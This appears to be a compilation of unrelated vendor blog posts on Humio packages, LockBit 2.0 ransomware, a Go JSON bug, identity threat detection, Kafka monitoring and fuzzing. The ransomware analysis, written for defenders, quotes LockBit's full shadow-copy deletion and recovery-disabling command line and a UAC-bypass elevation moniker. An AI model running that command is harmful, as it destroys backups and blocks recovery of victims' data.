Humio is a powerful and super flexible platform that allows customers to log everything and answer anything. Users can choose how to ingest their data and choose how to create and manage their data with Humio. The goal of Humio’s marketplace is to provide a variety of packages that power our customers with faster and more convenient ways to get more from their data across a variety of use cases.

What is the Humio Marketplace?

The Humio Marketplace is a collection of prebuilt packages created by Humio, partners and customers that Humio customers can access within the Humio product interface.

These packages are relevant to popular log sources and typically contain a parser and some dashboards and/or saved queries. The package documentation includes advice and guidance on how to best ingest the data into Humio to start getting immediate value from logs.

What is a package?

The Marketplace contains prebuilt packages that are essentially YAML files that describe the Humio assets included in the package. A package can include any or all of: a parser, saved searches, alerts, dashboards, lookup files and labels. The package also includes YAML files for the metadata of the package (such as descriptions and tags, support status and author), and a README file which contains a full description and explanation of any prerequisites, etc.

Packages can be configured as either a Library type package — which means, once installed, the assets are available as templates to build from — or an Application package, which means, once installed, the assets are instantiated and are live immediately.

By creating prebuilt content that is quick and simple to install, we want to make it easier for customers to onboard new log sources to Humio to quickly get value from that data. With this prebuilt content, customers won’t have to work out the best way of ingesting the logs and won’t have to create parsers and dashboards from scratch.

How do I make a package?

Packages are a great way to mitigate manual work, whether that’s taking advantage of prebuilt packages or making your own packages so you don’t have to begin new processes all over.

Anyone can create a Humio package straight from Humio’s interface. We actively encourage customers and partners to create packages and submit those packages for inclusion in the Marketplace if they think they could benefit other customers. Humio will work with package creators to make sure the package meets our standards for inclusion in the Marketplace. By sharing your package with all Humio customers through the Marketplace, you are strengthening the community and allowing others to benefit from your expertise while you, likewise, benefit from others’ expertise.

For some customers, the package will be exactly what they want, but for others, it will be a useful starting point for further customization. All Humio packages are provided under an Apache 2.0 license, so customers are free to adapt and reuse the package as needed.

If I install a package, will it get updated?

Package creators can develop updates in response to changes in log formats or to introduce new functionality and improvements. Updates will be advertised as available in the Marketplace and users can choose to accept the update. The update process will check to see if any local changes have been made to assets installed from the package and, if so, will prompt the user to either overwrite the changes with the standard version from the updated package or to keep the local changes.

Are packages free?

Yes, all Humio packages in the Marketplace are free to use!

Can I use packages to manage my own private Humio content?

Absolutely! Packages are a convenient way for customers to manage their own private Humio content. Packages can be created in the Humio product interface and can be downloaded as a ZIP file and uploaded into a different Humio repository or a different instance of Humio (cloud or hybrid). Customers can also store their Humio packages in a code repository and use their CI/CD tools and the Humio API to deploy and manage Humio assets as they would their own code. This streamlines Humio support and operations and delivers a truly agile approach to log management.

Get started today

To get started with packages is simple. All you need is access to a Humio Cloud service, or if running Humio self-hosted, you need to be on V1.21 or later. To create and install packages, you need the “Change Packages” permission assigned to your Humio user role.

Access the Marketplace from within the Humio product UI (Go to Settings, Packages, then Marketplace to browse the available packages or to create your own package). Try creating a package and uploading it to a different repository. If you create a nice complex dashboard and want to recreate it in a different repository, you know what to do: Create a package; export/import it, and then you don’t need to spend time recreating it!

Let us know what else you want to see in the Marketplace by connecting with us at The Nest or emailing [email protected].

Additional Resources

✇ CrowdStrike

Ransomware (R)evolution Plagues Organizations, But CrowdStrike Protection Never Wavers

By: Thomas Moses - Sarang Sonawane - Liviu Arsene
  • ECrime activities dominate the threat landscape, with ransomware as the main driver
  • Ransomware operators constantly refine their code and the efficacy of their operations
  • CrowdStrike uses improved behavior-based detections to prevent ransomware from tampering with Volume Shadow Copies
  • Volume Shadow Copy Service (VSS) backup protection nullifies attackers’ deletion attempts, retaining snapshots in a recoverable state

Ransomware is dominating the eCrime landscape and is a significant concern for organizations, as it can cause major disruptions. ECrime accounted for over 75% of interactive intrusion activity from July 2020 to June 2021, according to the recent CrowdStrike 2021 Threat Hunting Report. The continually evolving big game hunting (BGH) business model has widespread adoption with access brokers facilitating access, with a major driver being dedicated leak sites to apply pressure for victim compliance. Ransomware continues to evolve, with threat actors implementing components and features that make it more difficult for victims to recover their data. 

Lockbit 2.0 Going for the Popularity Vote

The LockBit ransomware family has constantly been adding new capabilities, including tampering with Microsoft Server Volume Shadow Copy Service (VSS) by interacting with the legitimate vssadmin.exe Windows tool. Capabilities such as lateral movement or destruction of shadow copies are some of the most effective and pervasive tactics ransomware uses.

Figure 1. LockBit 2.0 ransom note (Click to enlarge)

The LockBit 2.0 ransomware has similar capabilities to other ransomware families, including the ability to bypass UAC (User Account Control), self-terminate or check the victim’s system language before encryption to ensure that it’s not in a Russian-speaking country. 

For example, LockBit 2.0 checks the default language of the system and the current user by using the Windows API calls GetSystemDefaultUILanguage and GetUserDefaultUILanguage. If the language code identifier matches the one specified, the program will exit. Figure 2 shows how the language validation is performed (function call 49B1C0).

Figure 2. LockBit 2.0 performing system language validation

LockBit can even perform a silent UAC bypass without triggering any alerts or the UAC popup, enabling it to encrypt silently. It first begins by checking if it’s running under Admin privileges. It does that by using specific API functions to get the process token (NTOpenProcessToken), create a SID identifier to check the permission level (CreateWellKnownSid), and then check whether the current process has sufficient admin privileges (CheckTokenMembership and ZwQueryInformationToken functions).

Figure 3. Group SID permissions for running process

If the process is not running under Admin, it will attempt to do so by initializing a COM object with elevation of the COM interface by using the elevation moniker COM initialization method with guid: Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}. A similar elevation trick has been used by DarkSide and REvil ransomware families in the past.

LockBit 2.0 also has lateral movement capabilities and can scan for other hosts to spread to other network machines. For example, it calls the GetLogicalDrives function to retrieve a bitmask of currently available drives to list all available drives on the system. If the found drive is a network share, it tries to identify the name of the resource and connect to it using API functions, such as WNetGetConnectionW, PathRemoveBackslashW, OpenThreadToken and DuplicateToken.

In essence, it’s no longer about targeting and compromising individual machines but entire networks. REvil and LockBit are just some of the recent ransomware families that feature this capability, while others such as Ryuk and WastedLocker share the same functionality. The CrowdStrike Falcon OverWatch™ team found that in 36% of intrusions, adversaries can move laterally to additional hosts in less than 30 minutes, according to the CrowdStrike 2021 Threat Hunting Report.

Another interesting feature of LockBit 2.0 is that it prints out the ransom note message on all connected printers found in the network, adding public shaming to its encryption and data exfiltration capabilities.

VSS Tampering: An Established Ransomware Tactic

The tampering and deletion of VSS shadow copies is a common tactic to prevent data recovery. Adversaries will often abuse legitimate Microsoft administrator tools to disable and remove VSS shadow copies. Common tools include Windows Management Instrumentation (WMI), BCDEdit (a command-line tool for managing Boot Configuration Data) and vssadmin.exe. LockBit 2.0 utilizes the following WMI command line for deleting shadow copies:

C:\Windows\System32\cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no

The use of preinstalled operating system tools, such as WMI, is not new. Still, adversaries have started abusing them as part of the initial access tactic to perform tasks without requiring a malicious executable file to be run or written to the disk on the compromised system. Adversaries have moved beyond malware by using increasingly sophisticated and stealthy techniques tailor-made to evade autonomous detections, as revealed by CrowdStrike Threat Graph®, which showed that 68% of detections indexed in April-June 2021 were malware-free.

VSS Protection with CrowdStrike

CrowdStrike Falcon takes a layered approach to detecting and preventing ransomware by using behavior-based indicators of attack (IOAs) and advanced machine learning, among other capabilities. We are committed to continually improving the efficacy of our technologies against known and unknown threats and adversaries. 

CrowdStrike’s enhanced IOA detections accurately distinguish malicious behavior from benign, resulting in high-confidence detections. This is especially important when ransomware shares similar capabilities with legitimate software, like backup solutions. Both can enumerate directories and write files that on the surface may seem inconsequential, but when correlated with other indicators on the endpoint, can identify a legitimate attack. Correlating seemingly ordinary behaviors allows us to identify opportunities for coverage across a wide range of malware families. For example, a single IOA can provide coverage for multiple families and previously unseen ones.

CrowdStrike’s recent innovation involves protecting shadow copies from being tampered with, adding another protection layer to mitigate ransomware attacks. Protecting shadow copies helps potentially compromised systems restore encrypted data with much less time and effort. Ultimately, this helps reduce operational costs associated with person-hours spent spinning up encrypted systems post-compromise.

The Falcon platform can prevent suspicious processes from tampering with shadow copies and performing actions such as changing file size to render the backup useless. For instance, should a LockBit 2.0 ransomware infection occur and attempt to use the legitimate Microsoft administrator tool (vssadmin.exe) to manipulate shadow copies, Falcon immediately detects this behavior and prevents the ransomware from deleting or tampering with them, as shown in Figure 4.

Figure 4. Falcon detects and blocks vssadmin.exe manipulation by LockBit 2.0 ransomware (Click to enlarge)

In essence, while a ransomware infection might be able to encrypt files on a compromised endpoint, Falcon can prevent ransomware from tampering with shadow copies and potentially expedite data recovery for your organization.

Figure 5. Falcon alert on detected and blocked ransomware activity for deleting VSS shadow copies (Click to enlarge)

Shown below is Lockbit 2.0 executing on a system without Falcon protections. Here, vssadmin is used to list the shadow copies. Notice the shadow copy has been deleted after execution.

Below is the same Lockbit 2.0 execution, now with Falcon and VSS protection enabled. The shadow copy is not deleted even though the ransomware has run successfully. Please note, we specifically allowed the ransomware to run during this demonstration.

CrowdStrike prevents the destruction and tampering of shadow copies with volume shadow service backup protection, retaining the snapshots in a recoverable state regardless of threat actors using traditional or new novel techniques. This allows for instant recovery of live systems post-attack through direct snapshot tools or system recovery.

VSS shadow copy protection is just one of the new improvements added to CrowdStrike’s layered approach. We remain committed to our mission to stop breaches, and constantly improving our machine learning and behavior-based detection and protection technologies enables the Falcon platform to identify and protect against tactics, techniques and procedures associated with sophisticated adversaries and threats.

CrowdStrike’s Layered Approach Provides Best-in-Class Protection

The Falcon platform unifies intelligence, technology and expertise to successfully detect and protect against ransomware. Artificial intelligence (AI)-powered machine learning and behavioral IOAs, fueled by a massive data set of trillions of events per week and threat actor intelligence, can identify and block ransomware. Coupled with expert threat hunters that proactively see and stop even the stealthiest of attacks, the Falcon platform uses a layered approach to protect the things that matter most to your organization from ransomware and other threats.

CrowdStrike Falcon endpoint protection packages unify the comprehensive technologies, intelligence and expertise needed to successfully stop breaches. For fully managed detection and response (MDR), Falcon Complete™ seasoned security professionals deliver 403% ROI and 100% confidence.

Indicators of Compromise (IOCs)

File SHA256
LockBit 2.0 0545f842ca2eb77bcac0fd17d6d0a8c607d7dbc8669709f3096e5c1828e1c049

Additional Resources

✇ CrowdStrike

Unexpected Adventures in JSON Marshaling

By: Dylan Bourque

Recently, one of our engineering teams encountered what seemed like a fairly straightforward issue: When they attempted to store UUID values to a database, it produced an error claiming that the value was invalid. With a few tweaks to one of our internal libraries, our team was able to resolve the issue. Or did they?

Fast forward one month later, and a different team noticed a peculiar problem. After deploying a new release, their service began logging strange errors alerting the team that the UUID values from the redrive queue could not be read.

So what went wrong? What we soon realized is that when we added a new behavior to our UUID library to solve our first problem, we inadvertently created a new one. In this blog post, we explore how adding seemingly benign new methods can actually be a breaking change, especially when working with JSON support in Go.  We will explore what we did wrong and how we were able to dig our way out of it. We’ll also outline some best practices for managing this type of change, along with some thoughts on how to avoid breaking things in the first place.

When Closing a Functional Gap Turns Into a Bug

This all started when one of our engineering teams added a new PostgreSQL database and ran into issues. They were attempting to store UUID values in a JSONB column in the PostgreSQL database using our internal csuuid library, which wraps a UUID value and adds some additional functionality specific to our systems. Strangely, the generated SQL being sent to the database always contained an empty string for that column, which is an invalid value.

INSERT INTO table (id, uuid_val) VALUES (42, '');

ERROR: invalid input syntax for type json

Checking the code, we saw that there was no specific logic for supporting database persistence.  Conveniently, the Go standard library already provides the scaffolding for making types compatible with database drivers in the form of the database/sql.Scanner and database/sql/driver.Valuer interfaces. The former is used when reading data from a database driver and the latter for writing values to the driver. Each interface is a single method and, since a csuuid.UUID wraps a github.com/gofrs/uuid.UUID value that already provides the correct implementations, extending the code was straightforward.

With this change, the team was now able to successfully store and retrieve csuuid.UUID values in the database.

Free Wins

As often happens, the temptation of “As long as we’re updating things …” crept in. We noticed that csuuid.UUID also did not include any explicit support for JSON marshaling. Like with the database driver support, the underlying github.com/gofrs/uuid.UUID type already provided the necessary functionality, so extending csuuid.UUID for this feature felt like a free win.

If a type can be represented as a string in a JSON document, then you can satisfy the encoding.TextMarshaler and encoding.TextUnmarshaler interfaces to convert your Go struct to/from a JSON string, rather than satisfying the potentially more complex Marshaler and Unmarshaler interfaces from the encoding/json package.

The excerpt from the documentation for the Go standard library’s json.Marshal() function below (emphasis mine) calls out this behavior:

Marshal traverses the value v recursively. If an encountered value implements the Marshaler interface and is not a nil pointer, Marshal calls its MarshalJSON method to produce JSON. If no MarshalJSON method is present but the value implements encoding.TextMarshaler instead, Marshal calls its MarshalText method and encodes the result as a JSON string. The nil pointer exception is not strictly necessary but mimics a similar, necessary exception in the behavior of UnmarshalJSON.

A UUID is a 128-bit value that can easily be represented as a 32-character string of hex digits; that string format is the typical way they are stored in JSON. Armed with this knowledge, extending csuuid.UUID to “correctly” support converting to/from JSON was another simple bit of code.

Other than a bit of logic to account for the pointer field within csuuid.UUID, these two new methods only had to delegate things to the inner github.com/gofrs/uuid.UUID value.

At this point, we felt like we had solved the original issue and gotten a clear bonus win. We danced a little jig and moved on to the next set of problems.

Celebrations all around!

A Trap Awaits

Unfortunately, all was not well in JSON Land. Several months after applying these changes, we deployed a new release of another of our services and started seeing errors logged about it not being able to read in values from its AWS Simple Queue Service (SQS) queue.  For system stability, we always do canary deployments of new services before rolling out changes to the entire fleet.  The new error logs started when the canary for this service was deployed.

Below are examples of the log messages:

From the new instances:
[ERROR] ..../sqs_client.go:42 - error unmarshaling Message from SQS: json: cannot unmarshal object into Go struct field event.trace_id of type *csuuid.UUID error='json: cannot unmarshal object into Go struct field event.trace_id of type *csuuid.UUID'

From both old and new instances:
[ERROR] ..../sqs_client.go:1138 - error unmarshaling Message from SQS: json: cannot unmarshal string into Go struct field event.trace_id of type csuuid.UUID error='json: cannot unmarshal string into Go struct field event.trace_id of type csuuid.UUID'

After some investigation, we were able to determine that the error was happening because we had inadvertently introduced an incompatibility in the JSON marshaling logic for csuuid.UUID. When one of the old instances wrote a message to the SQS queue and one of the new ones processed it, or vice versa, the code would fail to read in the JSON data, thus logging one of the above messages.

json.Marshal() and json.Unmarshal() Work, Even If by Accident

The hint that unlocked the mystery was noticing the slight difference in the two log messages. Some showed “cannot unmarshal object into Go struct field” and the others showed “cannot unmarshal string into Go struct field.” This difference triggered a memory of that “free win” we celebrated earlier.

The root cause of the bug was that, in prior versions of the csuuid module, the csuuid.UUID type contained only unexported fields, and it had no explicit support for converting to/from JSON. In this case, the fallback behavior of json.Marshal() is to output an empty JSON object, {}. Conversely, in the old code, json.Unmarshal() was able to use reflection to convert that same {} into an empty csuuid.UUID value.

The below example Go program displays this behavior:

With the new code, we were trying to read that empty JSON object {} (which was produced by the old code on another node) as a string containing the hex digits of a UUID. This was because json.Unmarshal() was calling our new UnmarshalText() method and failing, which generated the log messages shown above. Similarly, the new code was producing a string of hex digits where the old code, without the new UnmarshalText() method, expected to get a JSON object.

We encountered a bit of serendipity here, though, because we accidentally discovered that the updated service had been losing those trace ID values called out in the logs for messages that went through the redrive logic. Fortunately, this hidden bug hadn’t caused any actual issues for us.

The snippet below highlights the behavior of the prior versions.

With this bug identified, we were in a quandary. The new code is correct and even fixes the data loss bug illustrated above. However, it  was unable to read in JSON data produced by the old code. As a result, it was dropping those events from the service’s SQS queue, which was not an acceptable option. Additionally, this same issue could be extant in many other services.

A Way Out Presents Itself

Since a Big Bang, deploy-everything-at-once-and-lose-data solution wasn’t tenable, we needed to find a way for csuuid.UUID to support both the existing, invalid JSON data and the new, correct format.

Going back to the documentation for JSON marshaling, UnmarshalText() is the second option for converting from JSON. If a type satisfies encoding/json.Unmarshaler, by providing UnmarshalJSON([]byte) error, then json.Unmarshal() will call that method, passing in the bytes of the JSON data. By implementing that method and using a json.Decoder to process the raw bytes of the JSON stream, we were able to accomplish what we needed.

The core of the solution relied on taking advantage of the previously unknown bug where the prior versions of csuuid.UUID always generated an empty JSON object when serialized. Using that knowledge, we created a json.Decoder to inspect the contents of the raw bytes before populating the csuuid.UUID value.

With this code in place, we were able to: 

  1. Confirm that the service could successfully queue and process messages across versions 
  2. Ensure any csuuid.UUID values are “correctly” marshaled to JSON as hex strings
  3. Write csuuid.UUID values to a database and read them back

Time to celebrate!

Lessons for the Future

Now that our team has resolved this issue, and all is well once again in JSON Land, let’s review a few lessons that we learned from our adventure:

  1. Normally, adding new methods to a type would not be a breaking change, as no consumers would be affected. Unfortunately, some special methods, like those that are involved in JSON marshaling, can generate breaking behavioral changes despite not breaking the consumer-facing API. This is something we overlooked when we got excited about our “free win.”
  2. Even if you don’t do it yourself, future consumers that you never thought of may decide to write values of your type to JSON. If you don’t consider what that representation should look like, the default behavior of Go’s encoding/json package may well do something that is deterministic but most definitely wrong , as was the case when  generating {} as the JSON value for our csuuid.UUID type. Take some time to think about what your type should look like when written to JSON, especially if the type is exported outside of the local module/package.
  3. Don’t forget that the simple, straightforward solutions are not the only ones available. In this scenario, introducing the new MarshalText()/UnmarshalText() methods was the simple, well documented way to correctly support converting csuuid.UUID values to/from JSON. However, doing the simple thing is what introduced the bug. By switching to the lower-level json.Decoder we were able to extend csuuid.UUID to be backwards compatible with the previous  code while also providing the “correct” behavior going forward.

Do you love solving technical challenges and want to embark on exciting engineering adventures? Browse our Engineering job listings and hear from some of the world’s most talented engineers.

✇ CrowdStrike

Credentials, Authentications and Hygiene: Supercharging Incident Response with Falcon Identity Threat Detection

By: Tim Parisi
  • CrowdStrike Incident Response teams leverage Falcon Identity Threat Detection (ITD) for Microsoft Active Directory (AD) and Azure AD account authentication visibility, credential hygiene and multifactor authentication implementation
  • Falcon ITD is integrated into the CrowdStrike Falcon® platform and provides alerts, dashboards and custom templates to identify compromised accounts and areas to reduce the attack surface and implement additional security measures
  • Falcon ITD allows our Incident Response teams to quickly identify malicious activity that would have previously only been visible through retroactive log review and audits, helping organizations eradicate threats faster and more efficiently

Incident responders and internal security teams have historically had limited visibility into Microsoft AD and Azure AD during an investigation, which has made containment and remediation more difficult and reliant on the victim organization to provide historical logs for retrospective analysis and perform manual authentication and hygiene audits. Since CrowdStrike acquired Preempt in 2020, the Services team has leveraged a new module in the Falcon platform, Falcon Identity Threat Detection (ITD), to gain timely and rich visibility throughout incident response investigations related to Activity Directory, specifically account authentication visibility, credential hygiene and multifactor authentication implementation. This blog highlights the importance of Falcon ITD in incident response and how our incident response teams use Falcon ITD today.

How Falcon ITD Is Leveraged During Incident Response

It’s no secret that one of CrowdStrike’s key differentiators in delivering high-quality, lower-cost investigations to victim organizations is the Falcon platform. Throughout 2021, we have included Falcon ITD in the arsenal of Falcon modules when performing incident response. This new module provides both clients and responders with the following critical data points during a response:

  • Suspicious logins/authentication activity
  • Failed login activity, including password spraying and brute force attempts
  • Inventory of all identities across the enterprise, including stale accounts, with password hygiene scores
  • Identity store (e.g., Active Directory, LDAP/S) verification and assessment to discover any vulnerabilities across multiple domains
  • Consolidated events around user, device, activity and more for improved visibility and pattern identification
  • Creation of a “Watch List” of specific accounts of interest

In a typical incident response investigation, our teams work with clients to understand the high-level Active Directory topology numbers (e.g., domains, accounts, endpoints and domain controllers). Once the domain controllers are identified, the Falcon ITD sensor is installed to begin baselining and assessing accounts, privileges, authentications and AD hygiene, which typically completes within five to 24 hours. Once complete, Falcon ITD telemetry and results are displayed in the Falcon platform for our responders and clients to analyze.  

Figure 1 shows the Falcon ITD Overview dashboard, which features attack surface risk categories and assesses the severity as Low, Medium or High. CrowdStrike responders use this data to understand highly exploitable ways an attacker could escalate privileges, such as non-privileged accounts that have attack paths to privileged accounts, accounts that can be traversed to compromise the privileged accounts’ credentials, or if the current password policies allow accounts with passwords that can be easily cracked.

Figure 1. Overview dashboard in Falcon ITD (Click to enlarge)

Figure 2 shows the main Incidents dashboard. This dashboard highlights suspicious events based on baseline patterns and indicators of authentication activity, and also includes any custom detection patterns the CrowdStrike incident response teams have configured, such as alerting when an account authenticates to a specific system.

Figure 2. Incidents main dashboard in Falcon ITD (Click to enlarge)

CrowdStrike responders leverage this information to understand and confirm findings such as the following scenarios:

  • Credentials were used to perform unusual LDAP activity that fits Service Principal Name (SPN) enumeration patterns 
  • An account entered the wrong two-factor verification code or the identity verification timeout was reached
  • Credentials used are consistent with “pass the hash” (PtH) techniques
  • Unusual LDAP search queries known to be used by the BloodHound reconnaissance tool were performed by an account

In addition to the above built-in policies, CrowdStrike responders, in consultation with clients, may also configure custom rules that will trigger alerts and even enforce controls within Falcon ITD, such as the following:

  • Alert if a specific account or group of accounts authenticates to any system or specific ones
  • Enforce a block for specific accounts from authenticating to any system or specific ones
  • Enforce a block for specific authentication protocols being used 
  • Implement identity verification from a 2FA provider such as Google, Duo or Azure for any account or for a specific one attempting to authenticate via Kerberos, LDAP or NTLM protocols
  • Implement a password reset for any account that has a compromised password

In other cases, responders are looking for additional information on accounts of interest that were observed performing suspicious activity. Typically, incident responders would have to coordinate with the client and have the client’s team provide information about that account (e.g., what group memberships it belongs to, what privileges the account has, and if it is a service or human account). Figure 3 shows how Falcon ITD displays this information and more, including password last change date, password strength and historical account activity. This is another example of how CrowdStrike responders are able to streamline the investigation, allowing our client to focus on getting back to business in a safe and secure manner.

Figure 3. Account information displayed in Falcon ITD (Click to enlarge)

Hygiene and Reconnaissance Case Study

During a recent incident response investigation, CrowdStrike Services identified an eCrime threat actor that maintained intermittent access to the victim’s environment for years. The threat actor leveraged multiple privileged accounts and created a domain administrator account — undetected — to perform reconnaissance, move laterally and gather information from the environment.

CrowdStrike incident responders leveraged Falcon ITD to quickly map out permissions associated with the accounts compromised by the threat actor, and identify password hygiene issues that aided the threat actor. By importing a custom password list into Falcon ITD, incident responders were able to identify accounts that were likely leveraged by the threat actor with the same organizational default or easily guessed password.

Falcon ITD also allowed CrowdStrike’s incident response teams to track the threat actor’s reconnaissance of SMB shares across the victim environment. The threat actor leveraged a legitimate administrative account on a system that did not have Falcon installed. Fortunately, the visibility provided by Falcon ITD still alerted incident responders to this reconnaissance activity, and we coordinated with the client to implement remediations to eradicate the threat actor. 

Multifactor Authentication and Domain Replication Case Study

During another investigation, CrowdStrike incident responders identified a nation-state threat actor that compromised an environment and had remained persistent for multiple years. With this level of sophisticated threat actor and the knowledge they had of the victim environment’s network, Active Directory structure and privileged credential usage, no malware was needed to be able to achieve their objectives.

In light of the multiyear undetected access, CrowdStrike incident responders leveraged Falcon ITD to aid in limiting the threat actor’s mobility by enforcing MFA validation for two scenarios, vastly reducing unauthorized lateral movement capabilities:

  • Enforce MFA (via Duo) for administrator usage of RDP to servers
  • Enforce MFA (via Duo) for any user to RDP from any server to a workstation

Falcon ITD’s detection capabilities were also paramount in identifying the threat actor’s resurgence in the victim network by alerting defenders to a domain replication attack. This allowed defenders to swiftly identify the source of the replication attack, which emanated from the victim’s VPN pool, and take corrective action on the VPN, impacted accounts and remote resources that were accessed by the threat actor.


Falcon Identity Threat Detection provides CrowdStrike incident response teams with another advantage when performing investigations into eCrime or nation-state attacks by providing increased visibility and control in Active Directory, which had previously been unachievable at speed and scale. 

Additional Resources

✇ CrowdStrike

A Principled Approach to Monitoring Streaming Data Infrastructure at Scale

By: Praveen Yedidi

Virtually every aspect of a modern business depends on having a reliable, secure, real-time, high-quality data stream. So how do organizations design, build and maintain a data processing pipeline that delivers? 

In creating a comprehensive monitoring strategy for CrowdStrike’s data processing pipelines, we found it helpful to consider four main attributes: observability, operability, availability and quality.

As illustrated above, we’re modeling these attributes along two axes — complexity of implementation and engineer experience — which enables us to classify these attributes into four quadrants.

In using this model, it is possible to consider the challenges involved in building a comprehensive monitoring system and the iterative approach engineers can take to realize benefits while advancing their monitoring strategy.

For example, in the lower left quadrant, we start with basic observability, which is relatively easy to address and is helpful in terms of creating a positive developer experience. As we move along the X axis and up the Y axis, measuring these attributes becomes challenging and might need a significant development effort.

In this post, we explore each of the four quadrants, starting with observability, which focuses on inferring the operational state of our data streaming infrastructure from the knowledge of external outputs. We will then explore availability and discuss how we make sure that the data keeps flowing end-to-end in our streaming data infrastructure systems without interruption. Next, we will discuss simple and repeatable processes to deal with the issues and the auto-remediations we created to help improve operability. Finally, we will explore how we improved efficiency of our processing pipelines and established some key indicators and some enforceable service level agreements (SLAs) for quality


Apache Kafka is a distributed, replicated messaging service platform that serves as a highly scalable, reliable and fast data ingestion and streaming tool. At CrowdStrike, we use Apache Kafka as the main component of our near real-time data processing systems to handle over a trillion events per day.

Ensuring Kafka Cluster Is Operational

When we create a new Kafka cluster, we must establish that it is reachable and operational. We can check that using a simple external service that constantly sends heartbeat messages to the Kafka cluster, and at the same time, consumes those messages. We can make sure that the messages that it produces matches the messages it has consumed. By doing that, we have gained confidence that the Kafka cluster is truly operational.

Once we establish that the cluster is operational, we check on other key metrics, such as the consumer group lag. 

Kafka Lag Monitoring

One of the key metrics to monitor when working with Kafka, as a data pipeline or a streaming platform, is consumer group lag.

When an application consumes messages from Kafka, it commits its offset in order to keep its position in the partition. When a consumer gets stuck for any reason — for example, an error, rebalance or even a complete stop — it can resume from the last committed offset and continue from the same point in time.

Therefore, lag is the delta between the last committed message to the last produced message. In other words, lag indicates how far behind your application is in processing up-to-date information. Also, Kafka persistence is based on retention, meaning that if your lag persists, you will lose data at some point in time. The goal is to keep lag to a minimum.

We use Burrow for monitoring Kafka consumer group lag. Burrow is an open source monitoring solution for Kafka that provides consumer lag checking as a service. It monitors committed offsets for all consumers and calculates the status of those consumers on demand. The metrics are exposed via an HTTP endpoint.

It also has configurable notifiers that can send status updates via email or HTTP if a partition status has changed based on predefined lag evaluation rules.

Burrow exposes both status and consumer group lag information in a structured format for a given consumer group across all of the partitions of the topic from which it is consuming. However, there is one drawback with this system: It will only present us with a snapshot of consumer group lag. Having the ability to look back in time and analyze historical trends in this data for a given consumer group is important for us.

To address this, we built a system called Kafka monitor. Kafka monitor fetches these metrics that are exposed by Burrow and stores them in a time series database. This enabled us to analyze historical trends and even perform velocity calculations like mean recovery time from lag for a Kafka consumer, for example.

In the next section, we explore how we implemented auto-remediations, using the consumer group status information from Burrow, to improve the availability and operability in our data infrastructure.

Availability and Operability

Kafka Cluster High Availability 

Initially, our organization relied on one very large cluster in Kafka to process incoming events. Over time, we expanded that cluster to manage our truly enormous data stream. 

However, as our company continues to grow, scaling our clusters vertically has become both problematic and impractical. Our recent blog post, Sharding Kafka for Increased Scale and Reliability, explores this issue and our solution in greater detail. 

Improved Availability and Operability for Stream Processing Jobs

For our stateless streaming jobs, we noticed that by simply relaunching these jobs upon getting stuck, we have a good chance of getting that consumer out of the stuck state. However, it is not practical at our scale to relaunch these jobs manually. So we created a tool called AlertResponder. As the name implies, it will automatically relaunch a stateless job upon getting the first consumer stuck alert.

Of course, we’ll still investigate the root cause afterward. Also, when the relaunch does not fix the problem or if it fails to relaunch for some reason, AlertResponder will then escalate this to an on-call engineer by paging them.

The second useful automation that we derive from our consumer lag monitoring is streaming jobs autoscaling. For most of our streams, traffic fluctuates on a daily basis. It is very inefficient to use a fixed capacity for all streaming jobs. During the peak hours, after the traffic exceeds a certain threshold, the consumer lag will increase dramatically. The direct impact of this is that the customers will see increased processing delays and latency at peak hours.

This is where auto-scaling helps. We use two auto-scaling strategies:

  1. Scheduled scaling: For stream processing jobs for which we are able to reliably predict the traffic patterns over the course of a day, we implemented a scheduled auto scaling strategy. With this strategy, we scale the consumer groups to a predetermined capacity at a known point in time to match the traffic patterns.
  2. Scaling based on consumer lag: For jobs running on our Kubernetes platform, we use KEDA (Kubernetes-based Event Driven Autoscaler) to scale the consumer groups. With KEDA, you can drive the scaling of any container in Kubernetes based on the number of events needing to be processed. We use KEDA’s Prometheus scaler. Using the consumer lag metrics that are available in prometheus, KEDA calculates the number of containers needed for the streaming jobs and works with HPA to scale a deployment accordingly.


When we talk about the quality of streaming data infrastructure, we are essentially considering two things: 

  1. Efficiency
  2. Conformance to service level agreements (SLAs)

Improving Efficiency Through Redistribution

When lag is uniform across a topic’s partitions, that is typically addressed by horizontal scaling of consumers as discussed above; however, when lag is not evenly distributed across a topic, scaling is much less effective.

Unfortunately, there is no out-of-the box way to address the issue of lag hotspots on certain partitions of a topic within Kafka. In our recent post, Addressing Uneven Partition Lag in Kafka, we explore our solution and how we can coordinate it across our complex ecosystem of more than 300 microservices. 

SLA-based Monitoring

It is almost impossible to measure the quality of a service correctly, let alone well, without understanding which behaviors really matter for that service and how to measure and evaluate those behaviors.

Service level indicators (SLIs), like data loss rate and end-to-end latency, are useful to measure the quality of our streaming data infrastructure. 

As an example, the diagram below shows how we track end-to-end latency through external observation (black box analysis).

We deploy monitors that submit sample input data to the data pipeline and observe the outputs from the pipeline. These monitors submit end-to-end processing latency metrics that, combined with our alerting framework, will be used to emit SLA-based alerts.


These four attributes — observability, availability, operability and quality — are each important in their own right for designing, working in and maintaining the streaming data infrastructure at scale. As discussed in our post, these attributes have a symbiotic relationship. The four-quadrant model not only exposes this relationship but also offers an intuitive mental model that helps us build a comprehensive monitoring solution for streaming data applications that operate at scale.

Have ideas to share about how you create a high-functioning data processing pipeline? Share your thoughts with @CrowdStrike via social media.

✇ CrowdStrike

A Foray into Fuzzing

By: Max Julian Hofmann

One useful method in a security researcher’s toolbox for discovering new bugs in software is called “fuzz testing,” or just “fuzzing.” Fuzzing is an automatic software testing approach where the software that is to be tested (the target) is automatically fed with input data and its behavior during execution is analyzed and checked for any errors. For the CrowdStrike Intelligence Advanced Research Team, fuzzing is one of our crucial tools to perform bug hunting.

In fuzzing, a fuzzing engine generates suitable inputs, passes them to the target and monitors its execution. The goal is to find an input where the target behaves undesirably. This is, for example, a crash (e.g., Segmentation Fault). Figure 1 shows the main steps of a fuzzing run.

Figure 1. Steps a fuzzing engine performs during execution

Some of the most popular fuzzing engines are American Fuzzy Lop (AFL) and its successor AFL++; libFuzzer; and Honggfuzz. They are known not only to be very efficient in fuzzing but also to have a remarkable trophy case to show. 

Fuzzing can be quite successful because of its minimal overhead compared to other dynamic testing methods — in both compilation and preparation, and also in execution. It typically requires only lightweight instrumentation (e.g., a fixed number of instructions per basic block), and can therefore achieve close to native execution speed. One important disadvantage to consider is that the fuzzing engine usually tests only a fraction of all possible inputs, and bugs may remain undetected.

